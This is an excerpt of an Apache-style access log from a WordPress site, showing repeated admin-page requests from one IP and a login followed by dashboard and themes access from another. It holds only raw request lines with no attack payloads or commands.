193.202.83.188 - - [26/Jan/2026:12:23:11 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:12 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:12 -0500] "GET /wp-admin/theme-install.php?browse=popular HTTP/1.1" 200 35322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:12 -0500] "GET /wp-admin/plugins.php HTTP/1.1" 200 49081 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:13 -0500] "GET /wp-admin/plugins.php HTTP/1.1" 200 49081 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:13 -0500] "GET /wp-admin/plugins.php HTTP/1.1" 200 49081 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:13 -0500] "GET /wp-admin/plugins.php HTTP/1.1" 200 49081 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
193.202.83.188 - - [26/Jan/2026:12:23:14 -0500] "GET /wp-admin/plugins.php HTTP/1.1" 200 49081 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
83.142.53.173 - - [26/Jan/2026:12:23:15 -0500] "GET /wp-login.php HTTP/1.1" 200 2282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0"
83.142.53.173 - - [26/Jan/2026:12:23:16 -0500] "GET /wp-login.php?wp_lang=en_US HTTP/1.1" 200 2282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
83.142.53.173 - - [26/Jan/2026:12:23:16 -0500] "POST /wp-login.php?wp_lang=en_US HTTP/1.1" 302 - "http://www.lovelygays.com/wp-login.php?wp_lang=en_US" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
83.142.53.173 - - [26/Jan/2026:12:23:16 -0500] "GET /wp-admin/ HTTP/1.1" 200 80852 "http://www.lovelygays.com/wp-login.php?wp_lang=en_US" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
83.142.53.173 - - [26/Jan/2026:12:23:17 -0500] "GET /wp-admin/themes.php HTTP/1.1" 200 51189 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
